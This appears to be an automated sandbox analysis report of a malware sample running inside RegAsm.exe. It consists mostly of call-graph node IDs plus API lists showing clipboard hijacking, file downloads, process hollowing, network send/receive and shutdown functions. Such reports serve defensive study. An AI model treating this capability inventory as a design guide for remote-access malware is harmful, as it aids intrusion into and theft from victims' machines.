41040->41041 41042 40160e 41041->41042 41042->40816 41042->40817 41155 41a0be 41043->41155 41046->40826 41047->41020 41048->41011 41049->41013 41050->41019 41052 42a8c8 41051->41052 41053 42a8cc 41051->41053 41052->41025 41054 432316 ___std_exception_copy 21 API calls 41053->41054 41055 42a8d1 41054->41055 41055->41025 41056->41033 41058 419b0a 41057->41058 41061 419b7c ctype 41058->41061 41070 419b26 41058->41070 41083 4232bc 21 API calls ___scrt_fastfail 41058->41083 41060 419bcd 41060->41070 41089 419d5a 51 API calls 41060->41089 41061->41060 41062 419be0 41061->41062 41063 419bf9 41061->41063 41071 4197ae 41062->41071 41065 419c03 41063->41065 41066 419cfd 41063->41066 41084 421a47 41065->41084 41066->41070 41090 419a29 22 API calls 41066->41090 41070->41038 41072 4197dc 41071->41072 41081 4197cb 41071->41081 41091 422db7 41072->41091 41074 4197fe 41074->41081 41098 419670 EnterCriticalSection LeaveCriticalSection 41074->41098 41076 419877 41076->41081 41099 4231ce 21 API calls ___scrt_fastfail 41076->41099 41078 419884 41078->41081 41100 42bb1c EnterCriticalSection 41078->41100 41080 419970 41080->41081 41101 42bb26 LeaveCriticalSection 41080->41101 41081->41060 41083->41061 41140 4219c7 41084->41140 41086 421a5b _memcmp 41088 421a91 41086->41088 41148 420fc9 41086->41148 41088->41060 41089->41070 41090->41070 41102 422e4d 41091->41102 41094 42a8be 21 API calls 41095 422de3 ctype 41094->41095 41096 42a8be 21 API calls 41095->41096 41097 422de9 ctype 41095->41097 41096->41097 41097->41074 41098->41076 41099->41078 41100->41080 41101->41081 41103 422e6d 41102->41103 41105 422dce 41102->41105 41104 421a47 23 API calls 41103->41104 41106 423022 41103->41106 41108 422e8f 41104->41108 41105->41094 41105->41095 41105->41097 41106->41105 41109 4230fe 41106->41109 41118 421c17 41106->41118 41108->41105 41112 422eed 41108->41112 41128 422a0c 21 API calls 41108->41128 41109->41105 41132 421e84 43 API calls _memcmp 41109->41132 41112->41105 41112->41106 41114 422fb8 
41112->41114 41129 4196d5 EnterCriticalSection LeaveCriticalSection 41112->41129 41115 422fe3 41114->41115 41130 4196d5 EnterCriticalSection LeaveCriticalSection 41114->41130 41115->41106 41131 419743 EnterCriticalSection LeaveCriticalSection 41115->41131 41119 421c2f 41118->41119 41122 421c81 41118->41122 41120 42a8be 21 API calls 41119->41120 41121 421c6e 41119->41121 41119->41122 41120->41121 41121->41122 41123 42a8be 21 API calls 41121->41123 41127 421c78 41121->41127 41122->41109 41125 421d00 41123->41125 41125->41122 41139 423647 22 API calls 41125->41139 41127->41122 41133 42649c 41127->41133 41128->41112 41129->41114 41130->41115 41131->41106 41132->41105 41134 4264ad 41133->41134 41138 4264f3 41133->41138 41135 4264ee 41134->41135 41136 423405 22 API calls 41134->41136 41134->41138 41137 426574 48 API calls 41135->41137 41135->41138 41136->41135 41137->41138 41138->41122 41139->41127 41141 421a3a 41140->41141 41142 4219d5 41140->41142 41141->41086 41142->41141 41152 42111e 21 API calls ctype 41142->41152 41144 421a15 41144->41141 41153 421952 22 API calls 41144->41153 41146 421a26 41154 42111e 21 API calls ctype 41146->41154 41151 420ff5 41148->41151 41149 42a8be 21 API calls 41150 420ffb ctype 41149->41150 41150->41088 41151->41149 41151->41150 41152->41144 41153->41146 41154->41141 41156 41a0c5 41155->41156 41157 419aea 51 API calls 41156->41157 41158 41a0e2 41157->41158 41158->40802 41159->40838 41160->40846 41164 401f7f 101 API calls 41161->41164 41163 401f7a 41164->41163 41166 41911a 41165->41166 41167 401771 41165->41167 41168 42a8be 21 API calls 41166->41168 41167->40869 41167->40875 41169 419124 41168->41169 41169->41167 41187 4164cd 41169->41187 41173->40893 41175 4192ad 41174->41175 41178 401812 41174->41178 41176 42a8be 21 API calls 41175->41176 41175->41178 41177 4192c9 41176->41177 41177->41178 41179 4164cd 27 API calls 41177->41179 41178->40908 41178->40910 41180 4192da 41179->41180 41181 4192e8 41180->41181 41216 4191ab 22 API calls 
41180->41216 41181->41178 41217 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41181->41217 41184->40916 41185->40920 41186->40878 41188 4164e4 ctype ___scrt_fastfail 41187->41188 41189 4166ec 41188->41189 41191 42a8be 21 API calls 41188->41191 41194 41669a 41189->41194 41202 41606a DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 41189->41202 41193 416693 ___scrt_fastfail 41191->41193 41192 4166fd 41192->41194 41195 42a8be 21 API calls 41192->41195 41193->41194 41197 42a8be 21 API calls 41193->41197 41194->41167 41201 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41194->41201 41196 416736 41195->41196 41196->41194 41203 42af2a 41196->41203 41199 4166c2 ___scrt_fastfail 41197->41199 41199->41194 41200 42a8be 21 API calls 41199->41200 41200->41189 41201->41167 41202->41192 41206 42ae49 41203->41206 41205 42af32 41205->41194 41207 42ae62 41206->41207 41211 42ae58 41206->41211 41208 42a8be 21 API calls 41207->41208 41207->41211 41209 42ae83 41208->41209 41209->41211 41212 42b1e6 CryptAcquireContextA 41209->41212 41211->41205 41213 42b20a CryptGenRandom 41212->41213 41214 42b205 41212->41214 41213->41214 41215 42b21e CryptReleaseContext 41213->41215 41214->41211 41215->41214 41216->41181 41217->41178 41218->40924 41222 40df57 41219->41222 41223 40df6d ___scrt_initialize_default_local_stdio_options 41222->41223 41226 4375cc 41223->41226 41229 4358b3 41226->41229 41230 4358f3 41229->41230 41231 4358db 41229->41231 41230->41231 41233 4358fb 41230->41233 41232 434256 __dosmaperr 20 API calls 41231->41232 41236 4358e0 __cftof 41232->41236 41234 4331fc __cftof 35 API calls 41233->41234 41235 43590b 41234->41235 41237 435d7b swprintf 20 API calls 41235->41237 41238 42c8db __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41236->41238 41239 435983 41237->41239 41240 40df7b 41238->41240 41244 436265 50 API calls 3 library calls 41239->41244 41240->40274 41242 435db0 swprintf 20 
API calls 41242->41236 41243 43598e 41243->41242 41244->41243 41246 43785b 41245->41246 41247 434256 __dosmaperr 20 API calls 41246->41247 41248 437892 __cftof 41246->41248 41247->41248 41248->40931 41250 40d000 RegQueryValueExA RegCloseKey 41249->41250 41251 40d02d 41249->41251 41250->41251 41251->40938 41253 402159 41252->41253 41254 402261 11 API calls 41253->41254 41255 402164 41254->41255 41262 402347 41255->41262 41257 402171 41257->40975 41259 4194e5 41258->41259 41260 40198d SetEvent 41258->41260 41259->41260 41270 4193aa 41259->41270 41260->40982 41263 402381 41262->41263 41264 402353 41262->41264 41269 4026de 22 API calls 41263->41269 41265 402723 28 API calls 41264->41265 41268 40235d 41265->41268 41268->41257 41271 4193d5 41270->41271 41272 4193b8 41270->41272 41271->41260 41272->41271 41277 4193fc 41272->41277 41289 42bb1c EnterCriticalSection 41272->41289 41275 4193e5 41275->41271 41290 42bb26 LeaveCriticalSection 41275->41290 41277->41271 41278 418551 41277->41278 41279 41856c pre_c_initialization 41278->41279 41280 4185d6 41279->41280 41281 4185b0 41279->41281 41291 419374 57 API calls 41279->41291 41280->41271 41281->41280 41285 4185cc 41281->41285 41292 416e98 41281->41292 41285->41280 41288 416e98 2 API calls 41285->41288 41296 4170f6 21 API calls 41285->41296 41297 418529 21 API calls 41285->41297 41298 41d053 21 API calls ctype 41285->41298 41288->41285 41289->41275 41290->41277 41291->41281 41293 416ea6 41292->41293 41294 416ead 41292->41294 41293->41285 41294->41293 41299 41ee06 41294->41299 41296->41285 41297->41285 41298->41285 41304 41ee86 send 41299->41304 41306 4019f3 recv 41305->41306 41307 4019c8 WaitForSingleObject 41305->41307 41309 401a04 41306->41309 41324 419516 41307->41324 41309->40995 41312 4021c9 11 API calls 41311->41312 41316 401b0d 41312->41316 41313 401c3e 41314 402091 11 API calls 41313->41314 41315 401c46 41314->41315 41315->40995 41316->41313 41317 402091 11 API calls 41316->41317 41318 4021e0 28 API calls 41316->41318 
41319 402077 28 API calls 41316->41319 41321 402006 28 API calls 41316->41321 41322 40209b 28 API calls 41316->41322 41317->41316 41318->41316 41320 401bd6 CreateEventA CreateThread WaitForSingleObject CloseHandle 41319->41320 41320->41316 41378 40f4a7 41320->41378 41321->41316 41322->41316 41323->41000 41325 419521 41324->41325 41326 4019e2 SetEvent 41324->41326 41325->41326 41328 4194be 41325->41328 41326->41309 41331 419438 41328->41331 41332 419445 41331->41332 41336 419462 41331->41336 41332->41336 41337 4186e1 41332->41337 41334 419477 41334->41336 41343 4192fb EnterCriticalSection 41334->41343 41336->41326 41338 4186fa 41337->41338 41339 41871f 41338->41339 41342 41873f ctype 41338->41342 41358 419374 57 API calls 41338->41358 41339->41342 41344 417fef 41339->41344 41342->41334 41343->41336 41349 418009 41344->41349 41346 417ef7 23 API calls 41346->41349 41347 41848e 41375 4187b2 24 API calls 41347->41375 41349->41346 41349->41347 41350 418487 41349->41350 41351 4184cb 41349->41351 41356 41805c 41349->41356 41359 41e9ee 41349->41359 41372 417120 24 API calls 41349->41372 41373 41cf75 24 API calls 41349->41373 41374 417dd1 24 API calls 41349->41374 41377 4187b2 24 API calls 41350->41377 41376 4187b2 24 API calls 41351->41376 41356->41339 41358->41339 41360 41ea58 41359->41360 41361 41ea0b 41359->41361 41364 41eb15 ctype 41360->41364 41365 41ea73 41360->41365 41362 41ea27 41361->41362 41363 41ea3c 41361->41363 41366 4187b2 24 API calls 41362->41366 41367 41e757 53 API calls 41363->41367 41368 41e757 53 API calls 41364->41368 41371 41ea31 ctype 41364->41371 41365->41363 41369 41eaa7 41365->41369 41365->41371 41366->41371 41367->41371 41368->41371 41370 42a8be 21 API calls 41369->41370 41370->41371 41371->41349 41372->41349 41373->41349 41374->41349 41375->41356 41376->41356 41377->41356 41379 4021e0 28 API calls 41378->41379 41380 40f4c6 SetEvent 41379->41380 41381 40f4db 41380->41381 41382 402006 28 API calls 41381->41382 41383 40f4f5 41382->41383 41384 4021e0 
28 API calls 41383->41384 41385 40f505 41384->41385 41386 4021e0 28 API calls 41385->41386 41387 40f517 41386->41387 41388 414384 28 API calls 41387->41388 41389 40f520 41388->41389 41390 40f52c 41389->41390 41391 40fa1e 41389->41391 41394 40f532 41390->41394 41395 40fa07 41390->41395 41392 410113 41391->41392 41393 40fa27 41391->41393 41396 410120 41392->41396 41397 41042e 41392->41397 41399 40ff89 41393->41399 41400 40fa2d 41393->41400 41407 40f543 GetTickCount 41394->41407 41561 40f689 41394->41561 41781 40f6b9 41394->41781 41398 40fa14 41395->41398 41395->41561 41404 4103e1 41396->41404 41405 410126 41396->41405 41401 4105a9 41397->41401 41408 410443 41397->41408 41824 408649 CreateThread 41398->41824 41403 4034cf 22 API calls 41399->41403 41415 40fa60 ExitProcess 41400->41415 41416 40fa70 41400->41416 41417 40fb71 41400->41417 41418 40fa42 41400->41418 41419 40fda4 OpenClipboard 41400->41419 41420 40fb15 41400->41420 41421 40fe06 41400->41421 41422 40fd89 OpenClipboard 41400->41422 41423 40fd0a OpenClipboard 41400->41423 41424 40fa7d 41400->41424 41425 40fa8f 41400->41425 41400->41561 41702 40fbf5 41400->41702 41462 4034cf 22 API calls 41401->41462 41402 4034fa 11 API calls 41409 4105da 41402->41409 41410 40ff94 41403->41410 41413 4103ea 41404->41413 41414 41040f ShowWindow SetForegroundWindow 41404->41414 41411 410381 41405->41411 41412 410131 41405->41412 41426 414155 28 API calls 41407->41426 41444 410541 41408->41444 41445 41044c 41408->41445 41428 402091 11 API calls 41409->41428 41429 4034cf 22 API calls 41410->41429 41447 4103c4 41411->41447 41448 410389 41411->41448 41434 410137 41412->41434 41435 41032a 41412->41435 41439 415128 87 API calls 41413->41439 41414->41561 41430 40fa68 Sleep 41416->41430 41431 40fa78 41416->41431 41440 4034cf 22 API calls 41417->41440 41450 4034cf 22 API calls 41418->41450 41441 40fdb3 GetClipboardData GlobalLock GlobalUnlock CloseClipboard 41419->41441 41419->41561 41829 40153a 14 API calls 41420->41829 41446 4034cf 22 API 
calls 41421->41446 41438 40fd98 EmptyClipboard 41422->41438 41422->41561 41449 40fd19 EmptyClipboard 41423->41449 41423->41561 41825 408de1 51 API calls 41424->41825 41436 40fa87 Sleep 41425->41436 41437 40fa97 41425->41437 41442 40f554 41426->41442 41465 4105e6 41428->41465 41453 40ffa0 41429->41453 41430->41416 41854 408817 54 API calls ___scrt_fastfail 41431->41854 41455 410231 41434->41455 41456 410143 41434->41456 41466 4034cf 22 API calls 41435->41466 41436->41425 41468 4034cf 22 API calls 41437->41468 41469 40fd9e CloseClipboard 41438->41469 41457 4103f1 CreateThread 41439->41457 41458 40fb7c 41440->41458 41470 403509 28 API calls 41441->41470 41459 4140ad GetTickCount 41442->41459 41851 406030 14 API calls 41444->41851 41460 410455 41445->41460 41461 410504 41445->41461 41471 40fe12 41446->41471 41454 4034cf 22 API calls 41447->41454 41472 4103a1 41448->41472 41473 41038e 41448->41473 41463 4034cf 22 API calls 41449->41463 41464 40fa4d 41450->41464 41451 40fb23 41474 40170e 100 API calls 41451->41474 41476 4034cf 22 API calls 41453->41476 41477 4103cf 41454->41477 41840 41069b 14 API calls 41455->41840 41478 41020c 41456->41478 41479 41014c 41456->41479 41457->41561 41517 433426 39 API calls 41458->41517 41480 40f560 41459->41480 41481 4104df 41460->41481 41482 41045e 41460->41482 41491 4034cf 22 API calls 41461->41491 41483 4105bc 41462->41483 41484 40fd29 41463->41484 41502 40fa54 DeleteFileW 41464->41502 41485 402091 11 API calls 41465->41485 41486 410336 41466->41486 41467 40fc02 41488 4034cf 22 API calls 41467->41488 41489 40faa3 41468->41489 41469->41419 41490 40fde7 41470->41490 41523 4034cf 22 API calls 41471->41523 41493 4034cf 22 API calls 41472->41493 41473->41561 41845 413544 317 API calls 41473->41845 41494 40fb30 41474->41494 41475 41054d 41495 4034cf 22 API calls 41475->41495 41496 40ffac 41476->41496 41497 4021e0 28 API calls 41477->41497 41507 4034cf 22 API calls 41478->41507 41498 410193 41479->41498 41529 4034cf 22 API calls 41479->41529 
41479->41561 41499 414155 28 API calls 41480->41499 41506 4034cf 22 API calls 41481->41506 41500 410463 41482->41500 41501 4104ba 41482->41501 41534 433426 39 API calls 41483->41534 41520 40fd30 GlobalAlloc GlobalLock 41484->41520 41503 4105f2 41485->41503 41536 410362 41486->41536 41537 41034b 41486->41537 41505 40fc0e 41488->41505 41538 4034cf 22 API calls 41489->41538 41508 4142e7 28 API calls 41490->41508 41509 410511 41491->41509 41512 4103ac 41493->41512 41514 402178 28 API calls 41494->41514 41515 410558 41495->41515 41543 4034cf 22 API calls 41496->41543 41516 4103da 41497->41516 41519 4034cf 22 API calls 41498->41519 41518 40f56b 41499->41518 41532 401673 3 API calls 41500->41532 41500->41561 41521 4034cf 22 API calls 41501->41521 41502->41561 41551 40fc23 41505->41551 41552 40fc39 41505->41552 41555 4104ea 41506->41555 41556 410217 41507->41556 41522 40fdf5 41508->41522 41558 402178 28 API calls 41509->41558 41510 41023d 41524 4034cf 22 API calls 41510->41524 41513 4021e0 28 API calls 41512->41513 41525 4103b7 41513->41525 41526 40fb3f 41514->41526 41527 4021e0 28 API calls 41515->41527 41847 410870 129 API calls 41516->41847 41530 40fb89 41517->41530 41531 41405d 30 API calls 41518->41531 41533 41019e 41519->41533 41535 4034cf 22 API calls 41520->41535 41549 4104c5 41521->41549 41539 4018e7 64 API calls 41522->41539 41559 40fe25 41523->41559 41560 410248 41524->41560 41846 404fd2 317 API calls 41525->41846 41541 4018e7 64 API calls 41526->41541 41542 410563 41527->41542 41565 410167 41529->41565 41544 4034cf 22 API calls 41530->41544 41545 40f579 41531->41545 41546 410478 41532->41546 41569 4101a5 StrToIntA 41533->41569 41547 4105c9 ShowWindow 41534->41547 41548 40fd54 41535->41548 41553 4034cf 22 API calls 41536->41553 41550 4034cf 22 API calls 41537->41550 41554 40fab7 41538->41554 41557 40fe01 41539->41557 41562 40fb4d 41541->41562 41563 4034cf 22 API calls 41542->41563 41564 40ffbf 41543->41564 41566 40fb9b 41544->41566 41567 4142e7 28 API calls 
41545->41567 41568 40170e 100 API calls 41546->41568 41547->41561 41598 4034cf 22 API calls 41548->41598 41583 433426 39 API calls 41549->41583 41570 410350 41550->41570 41571 4034cf 22 API calls 41551->41571 41573 4034cf 22 API calls 41552->41573 41572 410367 41553->41572 41826 40900f 31 API calls 41554->41826 41574 433426 39 API calls 41555->41574 41575 433426 39 API calls 41556->41575 41601 4034ff 11 API calls 41557->41601 41576 410523 41558->41576 41832 40cb60 37 API calls 41559->41832 41577 433426 39 API calls 41560->41577 41561->41402 41578 401a3c 286 API calls 41562->41578 41579 41056e 41563->41579 41609 4034cf 22 API calls 41564->41609 41594 4034cf 22 API calls 41565->41594 41611 4034cf 22 API calls 41566->41611 41580 40f587 41567->41580 41581 410480 41568->41581 41582 4034cf 22 API calls 41569->41582 41584 4021e0 28 API calls 41570->41584 41585 40fc2a 41571->41585 41586 4021e0 28 API calls 41572->41586 41587 40fc3e 41573->41587 41588 4104f7 41574->41588 41589 410224 41575->41589 41605 40d202 14 API calls 41576->41605 41591 410255 41577->41591 41592 40fb60 41578->41592 41593 4021e0 28 API calls 41579->41593 41595 4034cf 22 API calls 41580->41595 41596 4034cf 22 API calls 41581->41596 41597 4101b9 41582->41597 41599 4104d2 41583->41599 41600 41035b 41584->41600 41622 433426 39 API calls 41585->41622 41586->41600 41624 40fc53 41587->41624 41625 40fc6c 41587->41625 41850 4140d0 OpenProcess CloseHandle 41588->41850 41839 407a60 22 API calls 41589->41839 41841 410d80 28 API calls 41591->41841 41830 401d0d 98 API calls 41592->41830 41608 410579 41593->41608 41610 410179 41594->41610 41612 40f595 41595->41612 41613 41048c 41596->41613 41836 40900f 31 API calls 41597->41836 41642 40fd66 ctype 41598->41642 41849 4140fc OpenProcess CloseHandle 41599->41849 41844 4106ac 125 API calls 41600->41844 41601->41561 41605->41561 41617 4034cf 22 API calls 41608->41617 41618 40ffd4 41609->41618 41637 433426 39 API calls 41610->41637 41619 40fbaf 41611->41619 41620 4047c1 28 
API calls 41612->41620 41621 4021e0 28 API calls 41613->41621 41615 40faca 41644 4034cf 22 API calls 41615->41644 41616 41026f 41646 4034cf 22 API calls 41616->41646 41627 410584 41617->41627 41833 40d8ed 53 API calls 41618->41833 41638 40fbb6 MessageBoxW 41619->41638 41629 40f5a3 41620->41629 41630 410497 41621->41630 41632 40fc37 ExitWindowsEx 41622->41632 41633 4034cf 22 API calls 41624->41633 41626 4034cf 22 API calls 41625->41626 41634 40fc71 41626->41634 41635 4021e0 28 API calls 41627->41635 41790 406ae8 41629->41790 41640 4018e7 64 API calls 41630->41640 41632->41561 41645 40fc5a 41633->41645 41661 40fc81 41634->41661 41662 40fcaa LoadLibraryA GetProcAddress 41634->41662 41647 41058f 41635->41647 41636 40ffdd 41648 4034cf 22 API calls 41636->41648 41649 410186 SetWindowTextW 41637->41649 41650 4034cf 22 API calls 41638->41650 41652 4104a3 41640->41652 41641 4101cc 41668 4034cf 22 API calls 41641->41668 41653 40fd74 GlobalUnlock SetClipboardData 41642->41653 41654 40fae2 41644->41654 41670 433426 39 API calls 41645->41670 41655 410282 41646->41655 41852 404993 317 API calls 41647->41852 41657 40ffed 41648->41657 41649->41498 41658 40fbca 41650->41658 41848 40400d 81 API calls 41652->41848 41653->41469 41669 40fae9 URLDownloadToFileW 41654->41669 41663 4021e0 28 API calls 41655->41663 41682 403509 28 API calls 41657->41682 41665 414155 28 API calls 41658->41665 41659 404779 28 API calls 41666 40f5c1 41659->41666 41671 4034cf 22 API calls 41661->41671 41673 4034cf 22 API calls 41662->41673 41672 41028d 41663->41672 41664 41059b 41853 40603e 98 API calls 41664->41853 41675 40fbe0 41665->41675 41676 406ae8 28 API calls 41666->41676 41667 4104a8 41677 401a3c 286 API calls 41667->41677 41678 4101e3 41668->41678 41669->41557 41679 40faf9 41669->41679 41670->41632 41680 40fc8d 41671->41680 41681 4034cf 22 API calls 41672->41681 41700 40fccd 41673->41700 41683 404779 28 API calls 41675->41683 41684 40f5d0 41676->41684 41677->41561 41837 414a52 CreateFileW WriteFile 

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F8A
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415002
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415016
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415027
                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0040A1F2), ref: 00415038
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041503B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0040A1F2), ref: 0041504C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041504F
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0040A1F2), ref: 00415060
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415063
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0040A1F2), ref: 00415074
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415077
                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0040A1F2), ref: 00415088
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041508B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0040A1F2), ref: 0041509C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041509F
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0040A1F2), ref: 004150AB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150AE
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0040A1F2), ref: 004150BB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150BE
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0040A1F2), ref: 004150C6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150C9
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0040A1F2), ref: 004150D1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150D4
                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0040A1F2), ref: 004150DC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004150DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                              • API String ID: 4236061018-3687161714
                                                                                              • Opcode ID: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                                                                              • Instruction ID: d3d602bbfd1a93ba908cf2750ad540eaaa7976be03134fdad1e537fc9d893f35
                                                                                              • Opcode Fuzzy Hash: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
                                                                                              • Instruction Fuzzy Hash: 1D41BBA0E9435876DA107BF25C4EE1F2D5CD965B9A3214937B804931A3E9FC850CCEAF

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountEventTick
                                                                                              • String ID: }F$PowrProf.dll$SetSuspendState$X|F$hlight
                                                                                              • API String ID: 180926312-747135334
                                                                                              • Opcode ID: b4f8bfaa92a33b2d89df3b74cd57c86bda3881004be2d32180297903a6c6945e
                                                                                              • Instruction ID: 98c374b66c36bac6561f19394a83ab35c3f0051b20c4d30e97aa66e57c35150d
                                                                                              • Opcode Fuzzy Hash: b4f8bfaa92a33b2d89df3b74cd57c86bda3881004be2d32180297903a6c6945e
                                                                                              • Instruction Fuzzy Hash: B452D53161430067C615FB72CC5AAAE369A9F90709F00493FF646B71D2EEBC8A49C75E

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040CFD6: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                                                                                • Part of subcall function 0040CFD6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                                                                                • Part of subcall function 0040CFD6: RegCloseKey.KERNEL32(?), ref: 0040D01F
                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040A76B
                                                                                              • ExitProcess.KERNEL32 ref: 0040A7CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                              • String ID: 5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$override
                                                                                              • API String ID: 2281282204-700099006
                                                                                              • Opcode ID: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                                                                              • Instruction ID: 240a189e5f2994f65e702c6cd8730735317bc8827ab5a1e8e31b0d69f5303e7b
                                                                                              • Opcode Fuzzy Hash: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
                                                                                              • Instruction Fuzzy Hash: BE21A161F1430067C6087A76494B92E3A69AB91719F40853EB501772CBEE7DCE09839F
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
